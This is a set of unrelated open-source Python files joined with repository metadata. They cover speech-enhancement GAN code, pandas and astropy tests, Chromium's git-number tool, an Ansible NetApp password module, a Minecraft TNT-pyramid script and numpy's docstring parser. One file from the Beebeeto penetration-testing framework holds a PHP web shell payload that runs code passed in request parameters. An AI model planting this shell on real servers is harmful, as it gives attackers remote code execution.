print('Using device: ', device.name)
udevices.append(device.name)
# execute the session
with tf.Session(config=config) as sess:
if FLAGS.model == 'gan':
print('Creating GAN model')
se_model = SEGAN(sess, FLAGS, udevices)
elif FLAGS.model == 'ae':
print('Creating AE model')
se_model = SEAE(sess, FLAGS, udevices)
elif FLAGS.model == 'gru' :
print("Creating GRU model")
se_model = GRUGAN(sess, FLAGS, udevices)
elif FLAGS.model == 'ddpg' :
print("Creating DDPG model")
se_model = DDPGGAN(sess, FLAGS, udevices)
else:
raise ValueError('{} model type not understood!'.format(FLAGS.model))
if FLAGS.test_wav is None:
se_model.train(FLAGS, udevices)
else:
if FLAGS.weights is None:
raise ValueError('weights must be specified!')
print('Loading model weights...')
se_model.load(FLAGS.save_path, FLAGS.weights)
fm, wav_data = wavfile.read(FLAGS.test_wav)
wavname = FLAGS.test_wav.split('/')[-1]
if fm != 16000:
raise ValueError('16kHz required! Test file is different')
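            # Map signed 16-bit PCM samples from [-32768, 32767] onto [-1.0, 1.0].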
wave = (2./65535.) * (wav_data.astype(np.float32) - 32767) + 1.
if FLAGS.preemph > 0:
print('preemph test wave with {}'.format(FLAGS.preemph))
x_pholder, preemph_op = pre_emph_test(FLAGS.preemph, wave.shape[0])
wave = sess.run(preemph_op, feed_dict={x_pholder:wave})
print('test wave shape: ', wave.shape)
print('test wave min:{} max:{}'.format(np.min(wave), np.max(wave)))
c_wave = se_model.clean(wave)
print('c wave min:{} max:{}'.format(np.min(c_wave), np.max(c_wave)))
            wavfile.write(os.path.join(FLAGS.save_clean_path, wavname), 16000, c_wave)
print('Done cleaning {} and saved '
'to {}'.format(FLAGS.test_wav,
os.path.join(FLAGS.save_clean_path, wavname)))
if __name__ == '__main__':
tf.app.run()
|
tbabej/astropy
|
refs/heads/master
|
astropy/utils/tests/data/test_package/__init__.py
|
4
|
from astropy.utils.data import get_pkg_data_filename
def get_data_filename():
return get_pkg_data_filename('data/foo.txt')
|
mbayon/TFG-MachineLearning
|
refs/heads/master
|
venv/lib/python3.6/site-packages/pandas/tests/indexes/datetimes/test_formats.py
|
15
|
from pandas import DatetimeIndex
import numpy as np
import pandas.util.testing as tm
import pandas as pd
def test_to_native_types():
index = DatetimeIndex(freq='1D', periods=3, start='2017-01-01')
# First, with no arguments.
expected = np.array(['2017-01-01', '2017-01-02',
'2017-01-03'], dtype=object)
result = index.to_native_types()
tm.assert_numpy_array_equal(result, expected)
# No NaN values, so na_rep has no effect
result = index.to_native_types(na_rep='pandas')
tm.assert_numpy_array_equal(result, expected)
# Make sure slicing works
expected = np.array(['2017-01-01', '2017-01-03'], dtype=object)
result = index.to_native_types([0, 2])
tm.assert_numpy_array_equal(result, expected)
# Make sure date formatting works
expected = np.array(['01-2017-01', '01-2017-02',
'01-2017-03'], dtype=object)
result = index.to_native_types(date_format='%m-%Y-%d')
tm.assert_numpy_array_equal(result, expected)
# NULL object handling should work
index = DatetimeIndex(['2017-01-01', pd.NaT, '2017-01-03'])
expected = np.array(['2017-01-01', 'NaT', '2017-01-03'], dtype=object)
result = index.to_native_types()
tm.assert_numpy_array_equal(result, expected)
expected = np.array(['2017-01-01', 'pandas',
'2017-01-03'], dtype=object)
result = index.to_native_types(na_rep='pandas')
tm.assert_numpy_array_equal(result, expected)
|
endlessm/chromium-browser
|
refs/heads/master
|
tools/swarming_client/third_party/depot_tools/git_number.py
|
1
|
#!/usr/bin/env vpython3
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Usage: %prog [options] [<commitref>]*
If no <commitref>'s are supplied, it defaults to HEAD.
Calculates the generation number for one or more commits in a git repo.
Generation number of a commit C with parents P is defined as:
generation_number(C, []) = 0
generation_number(C, P) = max(map(generation_number, P)) + 1
This number can be used to order commits relative to each other, as long as for
any pair of the commits, one is an ancestor of the other.
Since calculating the generation number of a commit requires walking that
commit's entire history, this script caches all calculated data inside the git
repo that it operates on in the ref 'refs/number/commits'.
"""
from __future__ import print_function
from __future__ import division
import binascii
import collections
import logging
import optparse
import os
import struct
import sys
import tempfile
import git_common as git
import subprocess2
CHUNK_FMT = '!20sL'
CHUNK_SIZE = struct.calcsize(CHUNK_FMT)
DIRTY_TREES = collections.defaultdict(int)
REF = 'refs/number/commits'
AUTHOR_NAME = 'git-number'
AUTHOR_EMAIL = 'chrome-infrastructure-team@google.com'
# Number of bytes to use for the prefix on our internal number structure.
# 0 is slow to deserialize. 2 creates way too much bookkeeping overhead (would
# need to reimplement cache data structures to be a bit more sophisticated than
# dicts). 1 seems to be just right.
PREFIX_LEN = 1
# Set this to 'threads' to gather coverage data while testing.
POOL_KIND = 'procs'
def pathlify(hash_prefix):
"""Converts a binary object hash prefix into a posix path, one folder per
byte.
>>> pathlify('\xDE\xAD')
'de/ad'
"""
if sys.version_info.major == 3:
return '/'.join('%02x' % b for b in hash_prefix)
else:
return '/'.join('%02x' % ord(b) for b in hash_prefix)
@git.memoize_one(threadsafe=False)
def get_number_tree(prefix_bytes):
"""Returns a dictionary of the git-number registry specified by
|prefix_bytes|.
This is in the form of {<full binary ref>: <gen num> ...}
>>> get_number_tree('\x83\xb4')
{'\x83\xb4\xe3\xe4W\xf9J*\x8f/c\x16\xecD\xd1\x04\x8b\xa9qz': 169, ...}
"""
ref = '%s:%s' % (REF, pathlify(prefix_bytes))
try:
raw = git.run('cat-file', 'blob', ref, autostrip=False, decode=False)
return dict(struct.unpack_from(CHUNK_FMT, raw, i * CHUNK_SIZE)
for i in range(len(raw) // CHUNK_SIZE))
except subprocess2.CalledProcessError:
return {}
@git.memoize_one(threadsafe=False)
def get_num(commit_hash):
"""Returns the generation number for a commit.
Returns None if the generation number for this commit hasn't been calculated
yet (see load_generation_numbers()).
"""
return get_number_tree(commit_hash[:PREFIX_LEN]).get(commit_hash)
def clear_caches(on_disk=False):
"""Clears in-process caches for e.g. unit testing."""
get_number_tree.clear()
get_num.clear()
if on_disk:
git.run('update-ref', '-d', REF)
def intern_number_tree(tree):
"""Transforms a number tree (in the form returned by |get_number_tree|) into
a git blob.
Returns the git blob id as hex-encoded string.
>>> d = {'\x83\xb4\xe3\xe4W\xf9J*\x8f/c\x16\xecD\xd1\x04\x8b\xa9qz': 169}
>>> intern_number_tree(d)
'c552317aa95ca8c3f6aae3357a4be299fbcb25ce'
"""
with tempfile.TemporaryFile() as f:
for k, v in sorted(tree.items()):
f.write(struct.pack(CHUNK_FMT, k, v))
f.seek(0)
return git.intern_f(f)
def leaf_map_fn(pre_tree):
"""Converts a prefix and number tree into a git index line."""
pre, tree = pre_tree
return '100644 blob %s\t%s\0' % (intern_number_tree(tree), pathlify(pre))
def finalize(targets):
"""Saves all cache data to the git repository.
After calculating the generation number for |targets|, call finalize() to
save all the work to the git repository.
This in particular saves the trees referred to by DIRTY_TREES.
"""
if not DIRTY_TREES:
return
msg = 'git-number Added %s numbers' % sum(DIRTY_TREES.values())
idx = os.path.join(git.run('rev-parse', '--git-dir'), 'number.idx')
env = os.environ.copy()
env['GIT_INDEX_FILE'] = idx
progress_message = 'Finalizing: (%%(count)d/%d)' % len(DIRTY_TREES)
with git.ProgressPrinter(progress_message) as inc:
git.run('read-tree', REF, env=env)
prefixes_trees = ((p, get_number_tree(p)) for p in sorted(DIRTY_TREES))
updater = subprocess2.Popen(['git', 'update-index', '-z', '--index-info'],
stdin=subprocess2.PIPE, env=env)
with git.ScopedPool(kind=POOL_KIND) as leaf_pool:
for item in leaf_pool.imap(leaf_map_fn, prefixes_trees):
updater.stdin.write(item.encode())
inc()
updater.stdin.close()
updater.wait()
assert updater.returncode == 0
tree_id = git.run('write-tree', env=env)
commit_cmd = [
# Git user.name and/or user.email may not be configured, so specifying
        # them explicitly. They are not used, but required by Git.
'-c', 'user.name=%s' % AUTHOR_NAME,
'-c', 'user.email=%s' % AUTHOR_EMAIL,
'commit-tree',
'-m', msg,
'-p'] + git.hash_multi(REF)
for t in targets:
commit_cmd.extend(['-p', binascii.hexlify(t).decode()])
commit_cmd.append(tree_id)
commit_hash = git.run(*commit_cmd)
git.run('update-ref', REF, commit_hash)
DIRTY_TREES.clear()
def preload_tree(prefix):
"""Returns the prefix and parsed tree object for the specified prefix."""
return prefix, get_number_tree(prefix)
def all_prefixes(depth=PREFIX_LEN):
if sys.version_info.major == 3:
prefixes = [bytes([i]) for i in range(255)]
else:
prefixes = [chr(i) for i in range(255)]
for x in prefixes:
# This isn't covered because PREFIX_LEN currently == 1
if depth > 1: # pragma: no cover
for r in all_prefixes(depth - 1):
yield x + r
else:
yield x
def load_generation_numbers(targets):
"""Populates the caches of get_num and get_number_tree so they contain
the results for |targets|.
Loads cached numbers from disk, and calculates missing numbers if one or
more of |targets| is newer than the cached calculations.
Args:
targets - An iterable of binary-encoded full git commit hashes.
"""
# In case they pass us a generator, listify targets.
targets = list(targets)
if all(get_num(t) is not None for t in targets):
return
if git.tree(REF) is None:
empty = git.mktree({})
commit_hash = git.run(
# Git user.name and/or user.email may not be configured, so specifying
        # them explicitly. They are not used, but required by Git.
'-c', 'user.name=%s' % AUTHOR_NAME,
'-c', 'user.email=%s' % AUTHOR_EMAIL,
'commit-tree',
'-m', 'Initial commit from git-number',
empty)
git.run('update-ref', REF, commit_hash)
with git.ScopedPool(kind=POOL_KIND) as pool:
preload_iter = pool.imap_unordered(preload_tree, all_prefixes())
rev_list = []
with git.ProgressPrinter('Loading commits: %(count)d') as inc:
# Curiously, buffering the list into memory seems to be the fastest
# approach in python (as opposed to iterating over the lines in the
# stdout as they're produced). GIL strikes again :/
cmd = [
'rev-list', '--topo-order', '--parents', '--reverse', '^' + REF,
] + [binascii.hexlify(target).decode() for target in targets]
for line in git.run(*cmd).splitlines():
tokens = [binascii.unhexlify(token) for token in line.split()]
rev_list.append((tokens[0], tokens[1:]))
inc()
get_number_tree.update(preload_iter)
with git.ProgressPrinter('Counting: %%(count)d/%d' % len(rev_list)) as inc:
for commit_hash, pars in rev_list:
num = max(map(get_num, pars)) + 1 if pars else 0
prefix = commit_hash[:PREFIX_LEN]
get_number_tree(prefix)[commit_hash] = num
DIRTY_TREES[prefix] += 1
get_num.set(commit_hash, num)
inc()
def main(): # pragma: no cover
parser = optparse.OptionParser(usage=sys.modules[__name__].__doc__)
parser.add_option('--no-cache', action='store_true',
help='Do not actually cache anything we calculate.')
parser.add_option('--reset', action='store_true',
help='Reset the generation number cache and quit.')
parser.add_option('-v', '--verbose', action='count', default=0,
help='Be verbose. Use more times for more verbosity.')
opts, args = parser.parse_args()
levels = [logging.ERROR, logging.INFO, logging.DEBUG]
logging.basicConfig(level=levels[min(opts.verbose, len(levels) - 1)])
# 'git number' should only be used on bots.
if os.getenv('CHROME_HEADLESS') != '1':
logging.error("'git-number' is an infrastructure tool that is only "
"intended to be used internally by bots. Developers should "
"use the 'Cr-Commit-Position' value in the commit's message.")
return 1
if opts.reset:
clear_caches(on_disk=True)
return
try:
targets = git.parse_commitrefs(*(args or ['HEAD']))
except git.BadCommitRefException as e:
parser.error(e)
load_generation_numbers(targets)
if not opts.no_cache:
finalize(targets)
print('\n'.join(map(str, map(get_num, targets))))
return 0
if __name__ == '__main__': # pragma: no cover
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
pgleeson/TempRepo3
|
refs/heads/master
|
pythonnC/Ex2_SaveProject.py
|
5
|
#
#
# A file which opens a neuroConstruct project, changes the value of the
# amplitude in the electrical stimulation to a random value, then saves the project
#
# Author: Padraig Gleeson
#
# This file has been developed as part of the neuroConstruct project
# This work has been funded by the Medical Research Council and the
# Wellcome Trust
#
#
try:
from java.io import File
from java.lang import System
except ImportError:
print "Note: this file should be run using ..\\nC.bat -python XXX.py' or './nC.sh -python XXX.py'"
print "See http://www.neuroconstruct.org/docs/python.html for more details"
quit()
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.utils import NumberGenerator
from math import *
from random import *
# Load an existing neuroConstruct project
projFile = File("TestPython/TestPython.neuro.xml")
print "Loading project from file: " + projFile.getAbsolutePath()+", exists: "+ str(projFile.exists())
pm = ProjectManager()
myProject = pm.loadProject(projFile)
print "Loaded project: " + myProject.getProjectName()
# Get first electrical stimulation & reset it
stim = myProject.elecInputInfo.getStim(0)
print "First stimulation setting: "+ str(stim)
newAmp = random()*0.2
stim.setAmp(NumberGenerator(newAmp))
myProject.elecInputInfo.updateStim(stim)
print "Stimulation now: "+ str(myProject.elecInputInfo.getStim(0))
# Save project & exit
myProject.markProjectAsEdited()
myProject.saveProject()
System.exit(0)
|
mgit-at/ansible
|
refs/heads/devel
|
lib/ansible/modules/storage/netapp/netapp_e_auth.py
|
5
|
#!/usr/bin/python
# (c) 2016, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: netapp_e_auth
short_description: NetApp E-Series set or update the password for a storage array.
description:
- Sets or updates the password for a storage array. When the password is updated on the storage array, it must be updated on the SANtricity Web
      Services proxy. Note that not all storage arrays have a Monitor or RO role.
version_added: "2.2"
author: Kevin Hulquest (@hulquest)
options:
validate_certs:
required: false
default: true
description:
- Should https certificates be validated?
type: bool
name:
description:
- The name of the storage array. Note that if more than one storage array with this name is detected, the task will fail and you'll have to use
the ID instead.
required: False
ssid:
description:
- the identifier of the storage array in the Web Services Proxy.
required: False
set_admin:
description:
- Boolean value on whether to update the admin password. If set to false then the RO account is updated.
type: bool
default: False
current_password:
description:
- The current admin password. This is not required if the password hasn't been set before.
required: False
new_password:
description:
- The password you would like to set. Cannot be more than 30 characters.
required: True
api_url:
description:
- The full API url.
- "Example: http://ENDPOINT:8080/devmgr/v2"
- This can optionally be set via an environment variable, API_URL
required: False
api_username:
description:
- The username used to authenticate against the API
- This can optionally be set via an environment variable, API_USERNAME
required: False
api_password:
description:
- The password used to authenticate against the API
- This can optionally be set via an environment variable, API_PASSWORD
required: False
'''
EXAMPLES = '''
- name: Test module
netapp_e_auth:
name: trex
current_password: OldPasswd
new_password: NewPasswd
set_admin: yes
api_url: '{{ netapp_api_url }}'
api_username: '{{ netapp_api_username }}'
api_password: '{{ netapp_api_password }}'
'''
RETURN = '''
msg:
description: Success message
returned: success
type: string
sample: "Password Updated Successfully"
'''
import json
import traceback
from ansible.module_utils.api import basic_auth_argument_spec
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.error import HTTPError
from ansible.module_utils._text import to_native
from ansible.module_utils.urls import open_url
HEADERS = {
"Content-Type": "application/json",
"Accept": "application/json",
"x-netapp-password-validate-method": "none"
}
def request(url, data=None, headers=None, method='GET', use_proxy=True,
force=False, last_mod_time=None, timeout=10, validate_certs=True,
url_username=None, url_password=None, http_agent=None, force_basic_auth=True, ignore_errors=False):
try:
r = open_url(url=url, data=data, headers=headers, method=method, use_proxy=use_proxy,
force=force, last_mod_time=last_mod_time, timeout=timeout, validate_certs=validate_certs,
url_username=url_username, url_password=url_password, http_agent=http_agent,
force_basic_auth=force_basic_auth)
except HTTPError as e:
r = e.fp
try:
raw_data = r.read()
if raw_data:
data = json.loads(raw_data)
else:
raw_data = None
except:
if ignore_errors:
pass
else:
raise Exception(raw_data)
resp_code = r.getcode()
if resp_code >= 400 and not ignore_errors:
raise Exception(resp_code, data)
else:
return resp_code, data
def get_ssid(module, name, api_url, user, pwd):
count = 0
all_systems = 'storage-systems'
systems_url = api_url + all_systems
rc, data = request(systems_url, headers=HEADERS, url_username=user, url_password=pwd,
validate_certs=module.validate_certs)
for system in data:
if system['name'] == name:
count += 1
if count > 1:
module.fail_json(
msg="You supplied a name for the Storage Array but more than 1 array was found with that name. " +
"Use the id instead")
else:
ssid = system['id']
else:
continue
if count == 0:
module.fail_json(msg="No storage array with the name %s was found" % name)
else:
return ssid
def get_pwd_status(module, ssid, api_url, user, pwd):
pwd_status = "storage-systems/%s/passwords" % ssid
url = api_url + pwd_status
try:
rc, data = request(url, headers=HEADERS, url_username=user, url_password=pwd,
validate_certs=module.validate_certs)
return data['readOnlyPasswordSet'], data['adminPasswordSet']
except HTTPError as e:
module.fail_json(msg="There was an issue with connecting, please check that your "
"endpoint is properly defined and your credentials are correct: %s" % to_native(e))
def update_storage_system_pwd(module, ssid, pwd, api_url, api_usr, api_pwd):
"""Update the stored storage-system password"""
update_pwd = 'storage-systems/%s' % ssid
url = api_url + update_pwd
post_body = json.dumps(dict(storedPassword=pwd))
try:
rc, data = request(url, data=post_body, method='POST', headers=HEADERS, url_username=api_usr,
url_password=api_pwd, validate_certs=module.validate_certs)
return rc, data
except Exception as e:
module.fail_json(msg="Failed to update system password. Id [%s]. Error [%s]" % (ssid, to_native(e)))
def set_password(module, ssid, api_url, user, pwd, current_password=None, new_password=None, set_admin=False):
"""Set the storage-system password"""
set_pass = "storage-systems/%s/passwords" % ssid
url = api_url + set_pass
if not current_password:
current_password = ""
post_body = json.dumps(
dict(currentAdminPassword=current_password, adminPassword=set_admin, newPassword=new_password))
try:
rc, data = request(url, method='POST', data=post_body, headers=HEADERS, url_username=user, url_password=pwd,
ignore_errors=True, validate_certs=module.validate_certs)
except Exception as e:
module.fail_json(msg="Failed to set system password. Id [%s]. Error [%s]" % (ssid, to_native(e)),
exception=traceback.format_exc())
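    # HTTP 422 indicates the array rejected the supplied current password; the
    # retry below resends the request with an empty current password, which
    # covers arrays that never had an admin password set (interpretation of the
    # existing retry logic, not vendor documentation).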
if rc == 422:
post_body = json.dumps(dict(currentAdminPassword='', adminPassword=set_admin, newPassword=new_password))
try:
rc, data = request(url, method='POST', data=post_body, headers=HEADERS, url_username=user, url_password=pwd,
validate_certs=module.validate_certs)
except:
# TODO(lorenp): Resolve ignored rc, data
module.fail_json(msg="Wrong or no admin password supplied. Please update your playbook and try again")
if int(rc) >= 300:
module.fail_json(msg="Failed to set system password. Id [%s] Code [%s]. Error [%s]" % (ssid, rc, data))
rc, update_data = update_storage_system_pwd(module, ssid, new_password, api_url, user, pwd)
if int(rc) < 300:
return update_data
else:
module.fail_json(msg="%s:%s" % (rc, update_data))
def main():
argument_spec = basic_auth_argument_spec()
argument_spec.update(dict(
name=dict(required=False, type='str'),
ssid=dict(required=False, type='str'),
current_password=dict(required=False, no_log=True),
new_password=dict(required=True, no_log=True),
set_admin=dict(required=True, type='bool'),
api_url=dict(required=True),
api_username=dict(required=False),
api_password=dict(required=False, no_log=True)
)
)
module = AnsibleModule(argument_spec=argument_spec, mutually_exclusive=[['name', 'ssid']],
required_one_of=[['name', 'ssid']])
name = module.params['name']
ssid = module.params['ssid']
current_password = module.params['current_password']
new_password = module.params['new_password']
set_admin = module.params['set_admin']
user = module.params['api_username']
pwd = module.params['api_password']
api_url = module.params['api_url']
module.validate_certs = module.params['validate_certs']
if not api_url.endswith('/'):
api_url += '/'
if name:
ssid = get_ssid(module, name, api_url, user, pwd)
ro_pwd, admin_pwd = get_pwd_status(module, ssid, api_url, user, pwd)
if admin_pwd and not current_password:
module.fail_json(
msg="Admin account has a password set. " +
"You must supply current_password in order to update the RO or Admin passwords")
if len(new_password) > 30:
module.fail_json(msg="Passwords must not be greater than 30 characters in length")
result = set_password(module, ssid, api_url, user, pwd, current_password=current_password,
new_password=new_password, set_admin=set_admin)
module.exit_json(changed=True, msg="Password Updated Successfully",
password_set=result['passwordSet'],
password_status=result['passwordStatus'])
if __name__ == '__main__':
main()
|
mohsraspi/mhscs14
|
refs/heads/master
|
robert/pyramid2.py
|
1
|
import minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
friendgame = minecraft.Minecraft.create("10.52.4.54")
#position = friendgame.player.getTilePos()
#x = position.x
#y = position.y
#z = position.z
x = 110
y = 33
z = -70
base = 5
x1 = x
x2 = x + base
z1 = z
z2 = z + base
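# Build a solid pyramid: each pass of the loop fills one square layer of
# block id 46 (TNT), then shrinks the square by one block on every side and
# steps up one level until the square is exhausted.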
while x2 - x1 >= 0:
    friendgame.setBlocks(x1, y, z1, x2, y, z2, 46, 1)
    x1 = x1 + 1
    x2 = x2 - 1
    z1 = z1 + 1
    z2 = z2 - 1
    y = y + 1
|
ver007/Beebeeto-framework
|
refs/heads/master
|
demo/utils/payload/webshell/php.py
|
20
|
#author: fyth
from webshell import *
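# Both payloads below embed var_dump(md5(123)); the response is then checked
# for '202cb962ac59075b964b07152d234b70' (the MD5 of "123") to confirm that the
# injected PHP actually executed on the target.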
class PhpShell(Webshell):
_password = 'cmd'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
_content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
|
leeping/mdtraj
|
refs/heads/master
|
mdtraj/testing/docscrape.py
|
17
|
"""Extract reference documentation from the NumPy source tree.
"""
# This code is copied directly from numpy
# numpy / doc / sphinxext / docscrape.py
# Copyright (c) 2005-2011, NumPy Developers.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the NumPy Developers nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function, division
import inspect
import textwrap
import re
import pydoc
from warnings import warn
from mdtraj.utils.six import StringIO, iteritems
class Reader(object):
"""A line-based string reader.
"""
def __init__(self, data):
"""
Parameters
----------
data : str
String with lines separated by '\n'.
"""
if isinstance(data,list):
self._str = data
else:
self._str = data.split('\n') # store string as list of lines
self.reset()
def __getitem__(self, n):
return self._str[n]
def reset(self):
self._l = 0 # current line nr
def read(self):
if not self.eof():
out = self[self._l]
self._l += 1
return out
else:
return ''
def seek_next_non_empty_line(self):
for l in self[self._l:]:
if l.strip():
break
else:
self._l += 1
def eof(self):
return self._l >= len(self._str)
def read_to_condition(self, condition_func):
start = self._l
for line in self[start:]:
if condition_func(line):
return self[start:self._l]
self._l += 1
if self.eof():
return self[start:self._l+1]
return []
def read_to_next_empty_line(self):
self.seek_next_non_empty_line()
def is_empty(line):
return not line.strip()
return self.read_to_condition(is_empty)
def read_to_next_unindented_line(self):
def is_unindented(line):
return (line.strip() and (len(line.lstrip()) == len(line)))
return self.read_to_condition(is_unindented)
def peek(self,n=0):
if self._l + n < len(self._str):
return self[self._l + n]
else:
return ''
def is_empty(self):
return not ''.join(self._str).strip()
class NumpyDocString(object):
def __init__(self, docstring, config={}):
docstring = textwrap.dedent(docstring).split('\n')
self._doc = Reader(docstring)
self._parsed_data = {
'Signature': '',
'Summary': [''],
'Extended Summary': [],
'Parameters': [],
'Returns': [],
'Raises': [],
'Warns': [],
'Other Parameters': [],
'Attributes': [],
'Methods': [],
'See Also': [],
'Notes': [],
'Warnings': [],
'References': '',
'Examples': '',
'index': {}
}
self._parse()
def __getitem__(self,key):
return self._parsed_data[key]
def __setitem__(self,key,val):
if not key in self._parsed_data:
warn("Unknown section %s" % key)
else:
self._parsed_data[key] = val
def _is_at_section(self):
self._doc.seek_next_non_empty_line()
if self._doc.eof():
return False
l1 = self._doc.peek().strip() # e.g. Parameters
if l1.startswith('.. index::'):
return True
l2 = self._doc.peek(1).strip() # ---------- or ==========
return l2.startswith('-'*len(l1)) or l2.startswith('='*len(l1))
def _strip(self,doc):
i = 0
j = 0
for i,line in enumerate(doc):
if line.strip(): break
for j,line in enumerate(doc[::-1]):
if line.strip(): break
return doc[i:len(doc)-j]
def _read_to_next_section(self):
section = self._doc.read_to_next_empty_line()
while not self._is_at_section() and not self._doc.eof():
if not self._doc.peek(-1).strip(): # previous line was empty
section += ['']
section += self._doc.read_to_next_empty_line()
return section
def _read_sections(self):
while not self._doc.eof():
data = self._read_to_next_section()
name = data[0].strip()
if name.startswith('..'): # index section
yield name, data[1:]
elif len(data) < 2:
yield StopIteration
else:
yield name, self._strip(data[2:])
def _parse_param_list(self,content):
r = Reader(content)
params = []
while not r.eof():
header = r.read().strip()
if ' : ' in header:
arg_name, arg_type = header.split(' : ')[:2]
else:
arg_name, arg_type = header, ''
desc = r.read_to_next_unindented_line()
desc = dedent_lines(desc)
params.append((arg_name,arg_type,desc))
return params
_name_rgx = re.compile(r"^\s*(:(?P<role>\w+):`(?P<name>[a-zA-Z0-9_.-]+)`|"
r" (?P<name2>[a-zA-Z0-9_.-]+))\s*", re.X)
def _parse_see_also(self, content):
"""
func_name : Descriptive text
continued text
another_func_name : Descriptive text
func_name1, func_name2, :meth:`func_name`, func_name3
"""
items = []
def parse_item_name(text):
"""Match ':role:`name`' or 'name'"""
m = self._name_rgx.match(text)
if m:
g = m.groups()
if g[1] is None:
return g[3], None
else:
return g[2], g[1]
raise ValueError("%s is not a item name" % text)
def push_item(name, rest):
if not name:
return
name, role = parse_item_name(name)
items.append((name, list(rest), role))
del rest[:]
current_func = None
rest = []
for line in content:
if not line.strip(): continue
m = self._name_rgx.match(line)
if m and line[m.end():].strip().startswith(':'):
push_item(current_func, rest)
current_func, line = line[:m.end()], line[m.end():]
rest = [line.split(':', 1)[1].strip()]
if not rest[0]:
rest = []
elif not line.startswith(' '):
push_item(current_func, rest)
current_func = None
if ',' in line:
for func in line.split(','):
if func.strip():
push_item(func, [])
elif line.strip():
current_func = line
elif current_func is not None:
rest.append(line.strip())
push_item(current_func, rest)
return items
def _parse_index(self, section, content):
"""
.. index: default
:refguide: something, else, and more
"""
def strip_each_in(lst):
return [s.strip() for s in lst]
out = {}
section = section.split('::')
if len(section) > 1:
out['default'] = strip_each_in(section[1].split(','))[0]
for line in content:
line = line.split(':')
if len(line) > 2:
out[line[1]] = strip_each_in(line[2].split(','))
return out
def _parse_summary(self):
"""Grab signature (if given) and summary"""
if self._is_at_section():
return
summary = self._doc.read_to_next_empty_line()
summary_str = " ".join([s.strip() for s in summary]).strip()
if re.compile('^([\w., ]+=)?\s*[\w\.]+\(.*\)$').match(summary_str):
self['Signature'] = summary_str
if not self._is_at_section():
self['Summary'] = self._doc.read_to_next_empty_line()
else:
self['Summary'] = summary
if not self._is_at_section():
self['Extended Summary'] = self._read_to_next_section()
def _parse(self):
self._doc.reset()
self._parse_summary()
for (section,content) in self._read_sections():
if not section.startswith('..'):
section = ' '.join([s.capitalize() for s in section.split(' ')])
if section in ('Parameters', 'Returns', 'Raises', 'Warns',
'Other Parameters', 'Attributes', 'Methods'):
self[section] = self._parse_param_list(content)
elif section.startswith('.. index::'):
self['index'] = self._parse_index(section, content)
elif section == 'See Also':
self['See Also'] = self._parse_see_also(content)
else:
self[section] = content
# string conversion routines
def _str_header(self, name, symbol='-'):
return [name, len(name)*symbol]
def _str_indent(self, doc, indent=4):
out = []
for line in doc:
out += [' '*indent + line]
return out
def _str_signature(self):
if self['Signature']:
return [self['Signature'].replace('*','\*')] + ['']
else:
return ['']
def _str_summary(self):
if self['Summary']:
return self['Summary'] + ['']
else:
return []
def _str_extended_summary(self):
if self['Extended Summary']:
return self['Extended Summary'] + ['']
else:
return []
def _str_param_list(self, name):
out = []
if self[name]:
out += self._str_header(name)
for param,param_type,desc in self[name]:
out += ['%s : %s' % (param, param_type)]
out += self._str_indent(desc)
out += ['']
return out
def _str_section(self, name):
out = []
if self[name]:
out += self._str_header(name)
out += self[name]
out += ['']
return out
def _str_see_also(self, func_role):
if not self['See Also']: return []
out = []
out += self._str_header("See Also")
last_had_desc = True
for func, desc, role in self['See Also']:
if role:
link = ':%s:`%s`' % (role, func)
elif func_role:
link = ':%s:`%s`' % (func_role, func)
else:
link = "`%s`_" % func
if desc or last_had_desc:
out += ['']
out += [link]
else:
out[-1] += ", %s" % link
if desc:
out += self._str_indent([' '.join(desc)])
last_had_desc = True
else:
last_had_desc = False
out += ['']
return out
def _str_index(self):
idx = self['index']
out = []
out += ['.. index:: %s' % idx.get('default','')]
for section, references in iteritems(idx):
if section == 'default':
continue
out += [' :%s: %s' % (section, ', '.join(references))]
return out
def __str__(self, func_role=''):
out = []
out += self._str_signature()
out += self._str_summary()
out += self._str_extended_summary()
for param_list in ('Parameters', 'Returns', 'Other Parameters',
'Raises', 'Warns'):
out += self._str_param_list(param_list)
out += self._str_section('Warnings')
out += self._str_see_also(func_role)
for s in ('Notes','References','Examples'):
out += self._str_section(s)
for param_list in ('Attributes', 'Methods'):
out += self._str_param_list(param_list)
